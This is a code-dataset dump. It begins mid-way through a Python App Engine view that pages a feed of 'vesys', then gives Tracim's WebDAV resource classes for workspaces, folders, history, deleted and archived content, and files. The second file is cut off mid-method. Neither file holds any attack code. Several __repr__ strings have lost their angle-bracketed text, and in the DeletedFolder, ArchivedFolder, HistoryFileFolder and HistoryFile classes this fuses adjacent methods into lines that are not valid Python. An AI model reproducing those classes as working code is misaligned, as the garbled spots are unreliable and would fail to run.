новые\n\t\tsipri = self.sipri\n\t\tgoodness = sipri.goodness\n\t\tuser_id = self.sipri.user_id\n\t\t\n\t\t# берем список весов новых\n\t\t# ----Инициализация----\n\t\tpage_size = sipri.default_page_size\n\t\tmax_c_str = sipri.rqh.request.get('c')\n\t\tmax_i_str = sipri.rqh.request.get('i')\n\t\tif max_c_str:\n\t\t\tmax_c = goodness.from_timestamp(milliseconds = int(max_c_str))\n\t\t\tmax_i = int(max_i_str)\n\t\telse:\n\t\t\tmax_c = max_i = None\n\t\tmore = None\n\t\t\n\t\t# ----Строим запрос----\n\t\t# для юзера\n\t\tif user_id:\n\t\t\t#Feed: s c f i k p l t.\n\t\t\tfq = Feed.query(\n\t\t\t\tndb.OR(\n\t\t\t\t\tFeed.s == 1,\n\t\t\t\t\tndb.AND(Feed.s == user_id, ndb.OR(Feed.p == 8, Feed.p == 0))\n\t\t\t\t)\n\t\t\t)\n\t\t# для анонимуса\n\t\telse:\n\t\t\tfq = Feed.query(Feed.s == 1)\n\t\t\n\t\t# ----Получаем курсор----\n\t\tfq = sipri.set_cursor_filter(fq, max_c, max_i)\n\t\tfs = fq.fetch(page_size + 1) # Выборка.\n\t\tmore, max_c, max_i, len_fs, last_feed = sipri.get_cursor(fs, page_size) # Получаем новый курсор.\n\t\t\n\t\t# ----Из айдишников делаем ключи----\n\t\tkeys = []\n\t\tfor i in range(0, len_fs): # таким образом, если есть more, то последний фид не берем, т.к. он выбирался для определения more\n\t\t\tf = fs[i]\n\t\t\tkey = ndb.Key(Account, f.f, Vesy, f.i)\n\t\t\tkeys.append(key)\n\t\t\n\t\t# ----По ключам получаем весы----\n\t\tvesys = ndb.get_multi(keys)\n\t\tvesys_list_header = u'Новые решения:'\n\t\t\n\t\tif more:\n\t\t\tmax_c = goodness.to_timestamp(max_c)\n\t\t\tmore_url = goodness.replace_or_add_qs_param(sipri.rqh.request.uri, 'c', max_c)\n\t\t\tmore_url = goodness.replace_or_add_qs_param(more_url, 'i', max_i)\n\t\telse:\n\t\t\tmore_url = None\n\t\t\n\t\tvesys_props = {\n\t\t\t'vesys': vesys,\n\t\t\t'vesys_list_header': vesys_list_header,\n\t\t\t'more_url': more_url,\n\t\t\t}\n\t\treturn vesys_props\n\n\n\tdef get_and_draw_latest_vesys(self):\n\t\t# отрисовываем список весов\n\t\tvesys_props = self.get_latest_vesys()\n\t\tvesys_list_html = self.sipri.vesy_view.draw_vesys_list(vesys_props['vesys'])\n\t\tvesys_props['vesys_list_html'] = vesys_list_html\n\t\treturn vesys_props\n\n\n\tdef get_and_draw_latest_vesys_page(self):\n\t\tvesys_props = self.get_and_draw_latest_vesys()\n\t\tvesy_props = self.sipri.vesy_view.get_and_draw_one_vesy(self.sipri.acc, None, None) if not self.sipri.help_showed else None\n\t\tavp = self.sipri.author_view.get_author_view_props(self.sipri.acc)\n\t\tauthor_block, vcard = self.sipri.author_view.draw_author_block(avp)\n\t\tprops = {\n\t\t\t'avp': avp,\n\t\t\t'author_block': author_block,\n\t\t\t'vcard': vcard,\n\t\t\t'vesys_props': vesys_props,\n\t\t\t'vesy_props': vesy_props,\n\t\t\t'sipri': self.sipri,\n\t\t\t'path_id': self.sipri.path_id,\n\t\t\t'user_id': self.sipri.user_id,\n\t\t\t}\n\t\ttemplate = self.sipri.JINJA_ENVIRONMENT.get_template('templates/latest-vesys.html')\n\t\thtml = template.render(props)\n\t\tself.sipri.rqh.response.write(html)\n\n\n","sub_path":"latest_vesys.py","file_name":"latest_vesys.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"28912023","text":"# coding: utf8\nimport logging\n\nimport os\n\nimport tg\nimport transaction\nimport typing\nimport re\nfrom datetime import datetime\nfrom time import mktime\nfrom os.path import dirname, basename\n\nfrom tracim.lib.content import ContentApi\nfrom tracim.lib.user import UserApi\nfrom tracim.lib.webdav import HistoryType\nfrom tracim.lib.webdav import FakeFileStream\nfrom tracim.lib.webdav.utils import transform_to_display\nfrom tracim.lib.webdav.utils import transform_to_bdd\nfrom tracim.lib.workspace import WorkspaceApi\nfrom tracim.model import data, new_revision\nfrom tracim.model.data import Content, ActionDescription\nfrom tracim.model.data import ContentType\nfrom tracim.lib.webdav.design import designThread, designPage\n\nfrom wsgidav import compat\nfrom wsgidav.dav_error import DAVError, HTTP_FORBIDDEN\nfrom wsgidav.dav_provider import DAVCollection, DAVNonCollection\nfrom wsgidav.dav_provider import _DAVResource\nfrom tracim.lib.webdav.utils import normpath\n\nfrom sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound\n\nlogger = logging.getLogger()\n\n\nclass ManageActions(object):\n \"\"\"\n This object is used to encapsulate all Deletion/Archiving related method as to not duplicate too much code\n \"\"\"\n def __init__(self, action_type: str, api: ContentApi, content: Content):\n self.content_api = api\n self.content = content\n\n self._actions = {\n ActionDescription.ARCHIVING: self.content_api.archive,\n ActionDescription.DELETION: self.content_api.delete,\n ActionDescription.UNARCHIVING: self.content_api.unarchive,\n ActionDescription.UNDELETION: self.content_api.undelete\n }\n\n self._to_name = {\n ActionDescription.ARCHIVING: 'archived',\n ActionDescription.DELETION: 'deleted'\n }\n\n self._type = action_type\n self._new_name = self.make_name()\n\n def action(self):\n try:\n # When undeleting/unarchiving we except a content with the new name to not exist, thus if we\n # don't get an error and the database request send back a result, we stop the action\n self.content_api.get_one_by_label_and_parent(self._new_name, self.content.parent)\n raise DAVError(HTTP_FORBIDDEN)\n except NoResultFound:\n with new_revision(self.content):\n self.content_api.update_content(self.content, self._new_name)\n self._actions[self._type](self.content)\n self.content_api.save(self.content, self._type)\n\n transaction.commit()\n\n def make_name(self) -> str:\n \"\"\"\n Will create the new name, either by adding '- deleted the [date]' after the name when archiving/deleting or\n removing this string when undeleting/unarchiving\n \"\"\"\n new_name = self.content.get_label_as_file()\n extension = ''\n\n # if the content has no label, the last .ext is important\n # thus we want to rename a file from 'file.txt' to 'file - deleted... .txt' and not 'file.txt - deleted...'\n is_file_name = self.content.label == ''\n if is_file_name:\n search = re.search(r'(\\.[^.]+)$', new_name)\n if search:\n extension = search.group(0)\n new_name = re.sub(r'(\\.[^.]+)$', '', new_name)\n\n if self._type in [ActionDescription.ARCHIVING, ActionDescription.DELETION]:\n new_name += ' - %s the %s' % (self._to_name[self._type], datetime.now().strftime('%d-%m-%Y at %H:%M'))\n else:\n new_name = re.sub(\n r'( - (%s|%s) the .*)$' % (self._to_name[ActionDescription.DELETION], self._to_name[ActionDescription.ARCHIVING]),\n '',\n new_name\n )\n\n new_name += extension\n\n return new_name\n\n\nclass Root(DAVCollection):\n \"\"\"\n Root ressource that represents tracim's home, which contains all workspaces\n \"\"\"\n\n def __init__(self, path: str, environ: dict):\n super(Root, self).__init__(path, environ)\n\n self.user = UserApi(None).get_one_by_email(environ['http_authenticator.username'])\n # TODO BS 20170221: Web interface should list all workspace to. We\n # disable it here for moment. When web interface will be updated to\n # list all workspace, change this here to.\n self.workspace_api = WorkspaceApi(self.user, force_role=True)\n\n def __repr__(self) -> str:\n return ''\n\n def getMemberNames(self) -> [str]:\n \"\"\"\n This method returns the names (here workspace's labels) of all its children\n\n Though for perfomance issue, we're not using this function anymore\n \"\"\"\n return [workspace.label for workspace in self.workspace_api.get_all()]\n\n def getMember(self, label: str) -> DAVCollection:\n \"\"\"\n This method returns the child Workspace that corresponds to a given name\n\n Though for perfomance issue, we're not using this function anymore\n \"\"\"\n try:\n workspace = self.workspace_api.get_one_by_label(label)\n workspace_path = '%s%s%s' % (self.path, '' if self.path == '/' else '/', transform_to_display(workspace.label))\n\n return Workspace(workspace_path, self.environ, workspace)\n except AttributeError:\n return None\n\n def createEmptyResource(self, name: str):\n \"\"\"\n This method is called whenever the user wants to create a DAVNonCollection resource (files in our case).\n\n There we don't allow to create files at the root;\n only workspaces (thus collection) can be created.\n \"\"\"\n raise DAVError(HTTP_FORBIDDEN)\n\n def createCollection(self, name: str):\n \"\"\"\n This method is called whenever the user wants to create a DAVCollection resource as a child (in our case,\n we create workspaces as this is the root).\n\n [For now] we don't allow to create new workspaces through\n webdav client. Though if we come to allow it, deleting the error's raise will\n make it possible.\n \"\"\"\n # TODO : remove comment here\n # raise DAVError(HTTP_FORBIDDEN)\n\n new_workspace = self.workspace_api.create_workspace(name)\n self.workspace_api.save(new_workspace)\n\n workspace_path = '%s%s%s' % (\n self.path, '' if self.path == '/' else '/', transform_to_display(new_workspace.label))\n\n transaction.commit()\n return Workspace(workspace_path, self.environ, new_workspace)\n\n def getMemberList(self):\n \"\"\"\n This method is called by wsgidav when requesting with a depth > 0, it will return a list of _DAVResource\n of all its direct children\n \"\"\"\n\n members = []\n for workspace in self.workspace_api.get_all():\n workspace_path = '%s%s%s' % (self.path, '' if self.path == '/' else '/', workspace.label)\n members.append(Workspace(workspace_path, self.environ, workspace))\n\n return members\n\n\nclass Workspace(DAVCollection):\n \"\"\"\n Workspace resource corresponding to tracim's workspaces.\n Direct children can only be folders, though files might come later on and are supported\n \"\"\"\n\n def __init__(self, path: str, environ: dict, workspace: data.Workspace):\n super(Workspace, self).__init__(path, environ)\n\n self.workspace = workspace\n self.content = None\n self.user = UserApi(None).get_one_by_email(environ['http_authenticator.username'])\n\n self.content_api = ContentApi(self.user, show_temporary=True)\n\n self._file_count = 0\n\n def __repr__(self) -> str:\n return \"\" % self.workspace.workspace_id\n\n def getPreferredPath(self):\n return self.path\n\n def getCreationDate(self) -> float:\n return mktime(self.workspace.created.timetuple())\n\n def getDisplayName(self) -> str:\n return self.workspace.label\n\n def getLastModified(self) -> float:\n return mktime(self.workspace.updated.timetuple())\n\n def getMemberNames(self) -> [str]:\n retlist = []\n\n children = self.content_api.get_all(\n parent_id=self.content.id if self.content is not None else None,\n workspace=self.workspace\n )\n\n for content in children:\n # the purpose is to display .history only if there's at least one content's type that has a history\n if content.type != ContentType.Folder:\n self._file_count += 1\n retlist.append(content.get_label_as_file())\n\n return retlist\n\n def getMember(self, content_label: str) -> _DAVResource:\n\n return self.provider.getResourceInst(\n '%s/%s' % (self.path, transform_to_display(content_label)),\n self.environ\n )\n\n def createEmptyResource(self, file_name: str):\n \"\"\"\n [For now] we don't allow to create files right under workspaces.\n Though if we come to allow it, deleting the error's raise will make it possible.\n \"\"\"\n # TODO : remove commentary here raise DAVError(HTTP_FORBIDDEN)\n if '/.deleted/' in self.path or '/.archived/' in self.path:\n raise DAVError(HTTP_FORBIDDEN)\n\n content = None\n\n # Note: To prevent bugs, check here again if resource already exist\n path = os.path.join(self.path, file_name)\n resource = self.provider.getResourceInst(path, self.environ)\n if resource:\n content = resource.content\n\n return FakeFileStream(\n file_name=file_name,\n content_api=self.content_api,\n workspace=self.workspace,\n content=content,\n parent=self.content,\n path=self.path + '/' + file_name\n )\n\n def createCollection(self, label: str) -> 'Folder':\n \"\"\"\n Create a new folder for the current workspace. As it's not possible for the user to choose\n which types of content are allowed in this folder, we allow allow all of them.\n\n This method return the DAVCollection created.\n \"\"\"\n\n if '/.deleted/' in self.path or '/.archived/' in self.path:\n raise DAVError(HTTP_FORBIDDEN)\n\n folder = self.content_api.create(\n content_type=ContentType.Folder,\n workspace=self.workspace,\n label=label,\n parent=self.content\n )\n\n subcontent = dict(\n folder=True,\n thread=True,\n file=True,\n page=True\n )\n\n self.content_api.set_allowed_content(folder, subcontent)\n self.content_api.save(folder)\n\n transaction.commit()\n\n return Folder('%s/%s' % (self.path, transform_to_display(label)),\n self.environ, folder,\n self.workspace)\n\n def delete(self):\n \"\"\"For now, it is not possible to delete a workspace through the webdav client.\"\"\"\n raise DAVError(HTTP_FORBIDDEN)\n\n def supportRecursiveMove(self, destpath):\n return True\n\n def moveRecursive(self, destpath):\n if dirname(normpath(destpath)) == self.environ['http_authenticator.realm']:\n self.workspace.label = basename(normpath(destpath))\n transaction.commit()\n else:\n raise DAVError(HTTP_FORBIDDEN)\n\n def getMemberList(self) -> [_DAVResource]:\n members = []\n\n children = self.content_api.get_all(False, ContentType.Any, self.workspace)\n\n for content in children:\n content_path = '%s/%s' % (self.path, transform_to_display(content.get_label_as_file()))\n\n if content.type == ContentType.Folder:\n members.append(Folder(content_path, self.environ, self.workspace, content))\n elif content.type == ContentType.File:\n self._file_count += 1\n members.append(File(content_path, self.environ, content))\n else:\n self._file_count += 1\n members.append(OtherFile(content_path, self.environ, content))\n\n if self._file_count > 0 and self.provider.show_history():\n members.append(\n HistoryFolder(\n path=self.path + '/' + \".history\",\n environ=self.environ,\n content=self.content,\n workspace=self.workspace,\n type=HistoryType.Standard\n )\n )\n\n if self.provider.show_delete():\n members.append(\n DeletedFolder(\n path=self.path + '/' + \".deleted\",\n environ=self.environ,\n content=self.content,\n workspace=self.workspace\n )\n )\n\n if self.provider.show_archive():\n members.append(\n ArchivedFolder(\n path=self.path + '/' + \".archived\",\n environ=self.environ,\n content=self.content,\n workspace=self.workspace\n )\n )\n\n return members\n\n\nclass Folder(Workspace):\n \"\"\"\n Folder resource corresponding to tracim's folders.\n Direct children can only be either folder, files, pages or threads\n By default when creating new folders, we allow them to contain all types of content\n \"\"\"\n\n def __init__(self, path: str, environ: dict, workspace: data.Workspace, content: data.Content):\n super(Folder, self).__init__(path, environ, workspace)\n\n self.content = content\n\n def __repr__(self) -> str:\n return \"\" % self.content.label\n\n def getCreationDate(self) -> float:\n return mktime(self.content.created.timetuple())\n\n def getDisplayName(self) -> str:\n return transform_to_display(self.content.get_label_as_file())\n\n def getLastModified(self) -> float:\n return mktime(self.content.updated.timetuple())\n\n def delete(self):\n ManageActions(ActionDescription.DELETION, self.content_api, self.content).action()\n\n def supportRecursiveMove(self, destpath: str):\n return True\n\n def moveRecursive(self, destpath: str):\n \"\"\"\n As we support recursive move, copymovesingle won't be called, though with copy it'll be called\n but i have to check if the client ever call that function...\n \"\"\"\n destpath = normpath(destpath)\n\n invalid_path = False\n\n # if content is either deleted or archived, we'll check that we try moving it to the parent\n # if yes, then we'll unarchive / undelete them, else the action's not allowed\n if self.content.is_deleted or self.content.is_archived:\n # we remove all archived and deleted from the path and we check to the destpath\n # has to be equal or else path not valid\n # ex: /a/b/.deleted/resource, to be valid destpath has to be = /a/b/resource (no other solution)\n current_path = re.sub(r'/\\.(deleted|archived)', '', self.path)\n\n if current_path == destpath:\n ManageActions(\n ActionDescription.UNDELETION if self.content.is_deleted else ActionDescription.UNARCHIVING,\n self.content_api,\n self.content\n ).action()\n else:\n invalid_path = True\n # if the content is not deleted / archived, check if we're trying to delete / archive it by\n # moving it to a .deleted / .archived folder\n elif basename(dirname(destpath)) in ['.deleted', '.archived']:\n # same test as above ^\n dest_path = re.sub(r'/\\.(deleted|archived)', '', destpath)\n\n if dest_path == self.path:\n ManageActions(\n ActionDescription.DELETION if '.deleted' in destpath else ActionDescription.ARCHIVING,\n self.content_api,\n self.content\n ).action()\n else:\n invalid_path = True\n # else we check if the path is good (not at the root path / not in a deleted/archived path)\n # and we move the content\n else:\n invalid_path = any(x in destpath for x in ['.deleted', '.archived'])\n invalid_path = invalid_path or any(x in self.path for x in ['.deleted', '.archived'])\n invalid_path = invalid_path or dirname(destpath) == self.environ['http_authenticator.realm']\n\n if not invalid_path:\n self.move_folder(destpath)\n\n if invalid_path:\n raise DAVError(HTTP_FORBIDDEN)\n\n def move_folder(self, destpath):\n\n workspace_api = WorkspaceApi(self.user)\n workspace = self.provider.get_workspace_from_path(\n normpath(destpath), workspace_api\n )\n\n parent = self.provider.get_parent_from_path(\n normpath(destpath),\n self.content_api,\n workspace\n )\n\n with new_revision(self.content):\n if basename(destpath) != self.getDisplayName():\n self.content_api.update_content(self.content, transform_to_bdd(basename(destpath)))\n self.content_api.save(self.content)\n else:\n if workspace.workspace_id == self.content.workspace.workspace_id:\n self.content_api.move(self.content, parent)\n else:\n self.content_api.move_recursively(self.content, parent, workspace)\n\n transaction.commit()\n\n def getMemberList(self) -> [_DAVResource]:\n members = []\n content_api = ContentApi(self.user)\n visible_children = content_api.get_all(\n self.content.content_id,\n ContentType.Any,\n self.workspace,\n )\n\n for content in visible_children:\n content_path = '%s/%s' % (self.path, transform_to_display(content.get_label_as_file()))\n\n try:\n if content.type == ContentType.Folder:\n members.append(Folder(content_path, self.environ, self.workspace, content))\n elif content.type == ContentType.File:\n self._file_count += 1\n members.append(File(content_path, self.environ, content))\n else:\n self._file_count += 1\n members.append(OtherFile(content_path, self.environ, content))\n except Exception as exc:\n logger.exception(\n 'Unable to construct member {}'.format(\n content_path,\n ),\n exc_info=True,\n )\n\n if self._file_count > 0 and self.provider.show_history():\n members.append(\n HistoryFolder(\n path=self.path + '/' + \".history\",\n environ=self.environ,\n content=self.content,\n workspace=self.workspace,\n type=HistoryType.Standard\n )\n )\n\n if self.provider.show_delete():\n members.append(\n DeletedFolder(\n path=self.path + '/' + \".deleted\",\n environ=self.environ,\n content=self.content,\n workspace=self.workspace\n )\n )\n\n if self.provider.show_archive():\n members.append(\n ArchivedFolder(\n path=self.path + '/' + \".archived\",\n environ=self.environ,\n content=self.content,\n workspace=self.workspace\n )\n )\n\n return members\n\n\nclass HistoryFolder(Folder):\n \"\"\"\n A virtual resource which contains a sub-folder for every files (DAVNonCollection) contained in the parent\n folder\n \"\"\"\n \n def __init__(self, path, environ, workspace: data.Workspace,\n content: data.Content=None, type: str=HistoryType.Standard):\n super(HistoryFolder, self).__init__(path, environ, workspace, content)\n\n self._is_archived = type == HistoryType.Archived\n self._is_deleted = type == HistoryType.Deleted\n\n self.content_api = ContentApi(\n current_user=self.user,\n show_archived=self._is_archived,\n show_deleted=self._is_deleted\n )\n\n def __repr__(self) -> str:\n return \"\" % self.content.file_name\n\n def getCreationDate(self) -> float:\n return mktime(datetime.now().timetuple())\n\n def getDisplayName(self) -> str:\n return '.history'\n\n def getLastModified(self) -> float:\n return mktime(datetime.now().timetuple())\n\n def getMember(self, content_label: str) -> _DAVResource:\n content = self.content_api.get_one_by_label_and_parent(\n content_label=content_label,\n content_parent=self.content\n )\n\n return HistoryFileFolder(\n path='%s/%s' % (self.path, content.get_label_as_file()),\n environ=self.environ,\n content=content)\n\n def getMemberNames(self) -> [str]:\n ret = []\n\n content_id = None if self.content is None else self.content.id\n for content in self.content_api.get_all(content_id, ContentType.Any, self.workspace):\n if (self._is_archived and content.is_archived or\n self._is_deleted and content.is_deleted or\n not (content.is_archived or self._is_archived or content.is_deleted or self._is_deleted))\\\n and content.type != ContentType.Folder:\n ret.append(content.get_label_as_file())\n\n return ret\n\n def createEmptyResource(self, name: str):\n raise DAVError(HTTP_FORBIDDEN)\n\n def createCollection(self, name: str):\n raise DAVError(HTTP_FORBIDDEN)\n\n def delete(self):\n raise DAVError(HTTP_FORBIDDEN)\n\n def handleDelete(self):\n return True\n\n def handleCopy(self, destPath: str, depthInfinity):\n return True\n\n def handleMove(self, destPath: str):\n return True\n\n def getMemberList(self) -> [_DAVResource]:\n members = []\n \n if self.content:\n children = self.content.children\n else:\n children = self.content_api.get_all(False, ContentType.Any, self.workspace)\n \n for content in children:\n if content.is_archived == self._is_archived and content.is_deleted == self._is_deleted:\n members.append(HistoryFileFolder(\n path='%s/%s' % (self.path, content.get_label_as_file()),\n environ=self.environ,\n content=content))\n\n return members\n\n\nclass DeletedFolder(HistoryFolder):\n \"\"\"\n A virtual resources which exists for every folder or workspaces which contains their deleted children\n \"\"\"\n\n def __init__(self, path: str, environ: dict, workspace: data.Workspace, content: data.Content=None):\n super(DeletedFolder, self).__init__(path, environ, workspace, content, HistoryType.Deleted)\n\n self._file_count = 0\n\n def __repr__(self):\n return \" float:\n return mktime(datetime.now().timetuple())\n\n def getDisplayName(self) -> str:\n return '.deleted'\n\n def getLastModified(self) -> float:\n return mktime(datetime.now().timetuple())\n\n def getMember(self, content_label) -> _DAVResource:\n\n content = self.content_api.get_one_by_label_and_parent(\n content_label=content_label,\n content_parent=self.content\n )\n\n return self.provider.getResourceInst(\n path='%s/%s' % (self.path, transform_to_display(content.get_label_as_file())),\n environ=self.environ\n )\n\n def getMemberNames(self) -> [str]:\n retlist = []\n\n if self.content:\n children = self.content.children\n else:\n children = self.content_api.get_all(False, ContentType.Any, self.workspace)\n\n for content in children:\n if content.is_deleted:\n retlist.append(content.get_label_as_file())\n\n if content.type != ContentType.Folder:\n self._file_count += 1\n\n return retlist\n\n def getMemberList(self) -> [_DAVResource]:\n members = []\n\n if self.content:\n children = self.content.children\n else:\n children = self.content_api.get_all(False, ContentType.Any, self.workspace)\n\n for content in children:\n if content.is_deleted:\n content_path = '%s/%s' % (self.path, transform_to_display(content.get_label_as_file()))\n\n if content.type == ContentType.Folder:\n members.append(Folder(content_path, self.environ, self.workspace, content))\n elif content.type == ContentType.File:\n self._file_count += 1\n members.append(File(content_path, self.environ, content))\n else:\n self._file_count += 1\n members.append(OtherFile(content_path, self.environ, content))\n\n if self._file_count > 0 and self.provider.show_history():\n members.append(\n HistoryFolder(\n path=self.path + '/' + \".history\",\n environ=self.environ,\n content=self.content,\n workspace=self.workspace,\n type=HistoryType.Standard\n )\n )\n\n return members\n\n\nclass ArchivedFolder(HistoryFolder):\n \"\"\"\n A virtual resources which exists for every folder or workspaces which contains their archived children\n \"\"\"\n def __init__(self, path: str, environ: dict, workspace: data.Workspace, content: data.Content=None):\n super(ArchivedFolder, self).__init__(path, environ, workspace, content, HistoryType.Archived)\n\n self._file_count = 0\n\n def __repr__(self) -> str:\n return \" float:\n return mktime(datetime.now().timetuple())\n\n def getDisplayName(self) -> str:\n return '.archived'\n\n def getLastModified(self) -> float:\n return mktime(datetime.now().timetuple())\n\n def getMember(self, content_label) -> _DAVResource:\n\n content = self.content_api.get_one_by_label_and_parent(\n content_label=content_label,\n content_parent=self.content\n )\n\n return self.provider.getResourceInst(\n path=self.path + '/' + transform_to_display(content.get_label_as_file()),\n environ=self.environ\n )\n\n def getMemberNames(self) -> [str]:\n retlist = []\n\n for content in self.content_api.get_all_with_filter(\n self.content if self.content is None else self.content.id, ContentType.Any):\n retlist.append(content.get_label_as_file())\n\n if content.type != ContentType.Folder:\n self._file_count += 1\n\n return retlist\n\n def getMemberList(self) -> [_DAVResource]:\n members = []\n\n if self.content:\n children = self.content.children\n else:\n children = self.content_api.get_all(False, ContentType.Any, self.workspace)\n\n for content in children:\n if content.is_archived:\n content_path = '%s/%s' % (self.path, transform_to_display(content.get_label_as_file()))\n\n if content.type == ContentType.Folder:\n members.append(Folder(content_path, self.environ, self.workspace, content))\n elif content.type == ContentType.File:\n self._file_count += 1\n members.append(File(content_path, self.environ, content))\n else:\n self._file_count += 1\n members.append(OtherFile(content_path, self.environ, content))\n\n if self._file_count > 0 and self.provider.show_history():\n members.append(\n HistoryFolder(\n path=self.path + '/' + \".history\",\n environ=self.environ,\n content=self.content,\n workspace=self.workspace,\n type=HistoryType.Standard\n )\n )\n\n return members\n\n\nclass HistoryFileFolder(HistoryFolder):\n \"\"\"\n A virtual resource that contains for a given content (file/page/thread) all its revisions\n \"\"\"\n\n def __init__(self, path: str, environ: dict, content: data.Content):\n super(HistoryFileFolder, self).__init__(path, environ, content.workspace, content, HistoryType.All)\n\n def __repr__(self) -> str:\n return \" str:\n return self.content.get_label_as_file()\n\n def createCollection(self, name):\n raise DAVError(HTTP_FORBIDDEN)\n\n def getMemberNames(self) -> [int]:\n \"\"\"\n Usually we would return a string, but here as we're working with different\n revisions of the same content, we'll work with revision_id\n \"\"\"\n ret = []\n\n for content in self.content.revisions:\n ret.append(content.revision_id)\n\n return ret\n\n def getMember(self, item_id) -> DAVCollection:\n\n revision = self.content_api.get_one_revision(item_id)\n\n left_side = '%s/(%d - %s) ' % (self.path, revision.revision_id, revision.revision_type)\n\n if self.content.type == ContentType.File:\n return HistoryFile(\n path='%s%s' % (left_side, transform_to_display(revision.file_name)),\n environ=self.environ,\n content=self.content,\n content_revision=revision)\n else:\n return HistoryOtherFile(\n path='%s%s' % (left_side, transform_to_display(revision.get_label_as_file())),\n environ=self.environ,\n content=self.content,\n content_revision=revision)\n\n def getMemberList(self) -> [_DAVResource]:\n members = []\n\n for content in self.content.revisions:\n\n left_side = '%s/(%d - %s) ' % (self.path, content.revision_id, content.revision_type)\n\n if self.content.type == ContentType.File:\n members.append(HistoryFile(\n path='%s%s' % (left_side, transform_to_display(content.file_name)),\n environ=self.environ,\n content=self.content,\n content_revision=content)\n )\n else:\n members.append(HistoryOtherFile(\n path='%s%s' % (left_side, transform_to_display(content.file_name)),\n environ=self.environ,\n content=self.content,\n content_revision=content)\n )\n\n return members\n\n\nclass File(DAVNonCollection):\n \"\"\"\n File resource corresponding to tracim's files\n \"\"\"\n def __init__(self, path: str, environ: dict, content: Content):\n super(File, self).__init__(path, environ)\n\n self.content = content\n self.user = UserApi(None).get_one_by_email(environ['http_authenticator.username'])\n self.content_api = ContentApi(self.user)\n\n # this is the property that windows client except to check if the file is read-write or read-only,\n # but i wasn't able to set this property so you'll have to look into it >.>\n # self.setPropertyValue('Win32FileAttributes', '00000021')\n\n def __repr__(self) -> str:\n return \"\" % self.content.revision_id\n\n def getContentLength(self) -> int:\n return self.content.depot_file.file.content_length\n\n def getContentType(self) -> str:\n return self.content.file_mimetype\n\n def getCreationDate(self) -> float:\n return mktime(self.content.created.timetuple())\n\n def getDisplayName(self) -> str:\n return self.content.file_name\n\n def getLastModified(self) -> float:\n return mktime(self.content.updated.timetuple())\n\n def getContent(self) -> typing.BinaryIO:\n filestream = compat.BytesIO()\n filestream.write(self.content.depot_file.file.read())\n filestream.seek(0)\n\n return filestream\n\n def beginWrite(self, contentType: str=None) -> FakeFileStream:\n return FakeFileStream(\n content=self.content,\n content_api=self.content_api,\n file_name=self.content.get_label_as_file(),\n workspace=self.content.workspace,\n path=self.path\n )\n\n def moveRecursive(self, destpath):\n \"\"\"As we support recursive move, copymovesingle won't be called, though with copy it'll be called\n but i have to check if the client ever call that function...\"\"\"\n destpath = normpath(destpath)\n\n invalid_path = False\n\n # if content is either deleted or archived, we'll check that we try moving it to the parent\n # if yes, then we'll unarchive / undelete them, else the action's not allowed\n if self.content.is_deleted or self.content.is_archived:\n # we remove all archived and deleted from the path and we check to the destpath\n # has to be equal or else path not valid\n # ex: /a/b/.deleted/resource, to be valid destpath has to be = /a/b/resource (no other solution)\n current_path = re.sub(r'/\\.(deleted|archived)', '', self.path)\n\n if current_path == destpath:\n ManageActions(\n ActionDescription.UNDELETION if self.content.is_deleted else ActionDescription.UNARCHIVING,\n self.content_api,\n self.content\n ).action()\n else:\n invalid_path = True\n # if the content is not deleted / archived, check if we're trying to delete / archive it by\n # moving it to a .deleted / .archived folder\n elif basename(dirname(destpath)) in ['.deleted', '.archived']:\n # same test as above ^\n dest_path = re.sub(r'/\\.(deleted|archived)', '', destpath)\n\n if dest_path == self.path:\n ManageActions(\n ActionDescription.DELETION if '.deleted' in destpath else ActionDescription.ARCHIVING,\n self.content_api,\n self.content\n ).action()\n else:\n invalid_path = True\n # else we check if the path is good (not at the root path / not in a deleted/archived path)\n # and we move the content\n else:\n invalid_path = any(x in destpath for x in ['.deleted', '.archived'])\n invalid_path = invalid_path or any(x in self.path for x in ['.deleted', '.archived'])\n invalid_path = invalid_path or dirname(destpath) == self.environ['http_authenticator.realm']\n\n if not invalid_path:\n self.move_file(destpath)\n\n if invalid_path:\n raise DAVError(HTTP_FORBIDDEN)\n\n def move_file(self, destpath):\n\n workspace = self.content.workspace\n parent = self.content.parent\n\n with new_revision(self.content):\n if basename(destpath) != self.getDisplayName():\n new_given_file_name = transform_to_bdd(basename(destpath))\n new_file_name, new_file_extension = \\\n os.path.splitext(new_given_file_name)\n\n self.content_api.update_content(\n self.content,\n new_file_name,\n )\n self.content.file_extension = new_file_extension\n self.content_api.save(self.content)\n else:\n workspace_api = WorkspaceApi(self.user)\n content_api = ContentApi(self.user)\n\n destination_workspace = self.provider.get_workspace_from_path(\n destpath,\n workspace_api,\n )\n\n destination_parent = self.provider.get_parent_from_path(\n destpath,\n content_api,\n destination_workspace,\n )\n\n self.content_api.move(\n item=self.content,\n new_parent=destination_parent,\n must_stay_in_same_workspace=False,\n new_workspace=destination_workspace\n )\n\n transaction.commit()\n\n def supportRecursiveMove(self, destPath):\n return True\n\n def delete(self):\n ManageActions(ActionDescription.DELETION, self.content_api, self.content).action()\n\n\nclass HistoryFile(File):\n \"\"\"\n A virtual resource corresponding to a specific tracim's revision's file\n \"\"\"\n def __init__(self, path: str, environ: dict, content: data.Content, content_revision: data.ContentRevisionRO):\n super(HistoryFile, self).__init__(path, environ, content)\n self.content_revision = content_revision\n\n def __repr__(self) -> str:\n return \" str:\n left_side = '(%d - %s) ' % (self.content_revision.revision_id, self.content_revision.revision_type)\n return '%s%s' % (left_side, transform_to_display(self.content_revision.file_name))\n\n def getContent(self):\n filestream = compat.BytesIO()\n filestream.write(self.content_revision.depot_file.file.read())\n filestream.seek(0)\n\n return filestream\n\n def getContentLength(self):\n return self.content_revision.depot_file.file.content_length\n\n def getContentType(self) -> str:\n return self.content_revision.file_mimetype\n\n def beginWrite(self, contentType=None):\n raise DAVError(HTTP_FORBIDDEN)\n\n def delete(self):\n raise DAVError(HTTP_FORBIDDEN)\n\n def copyMoveSingle(self, destpath, ismove):\n raise DAVError(HTTP_FORBIDDEN)\n\n\nclass OtherFile(File):\n \"\"\"\n File resource corresponding to tracim's page and thread\n \"\"\"\n def __init__(self, path: str, environ: dict, content: data.Content):\n super(OtherFile, self).__init__(path, environ, content)\n\n self.content_revision = self.content.revision\n\n self.content_designed = self.design()\n\n # workaround for consistent request as we have to return a resource with a path ending with .html\n # when entering folder for windows, but only once because when we select it again it would have .html.html\n # which is no good\n if not self.path.endswith('.html'):\n self.path += '.html'\n\n def getDisplayName(self) -> 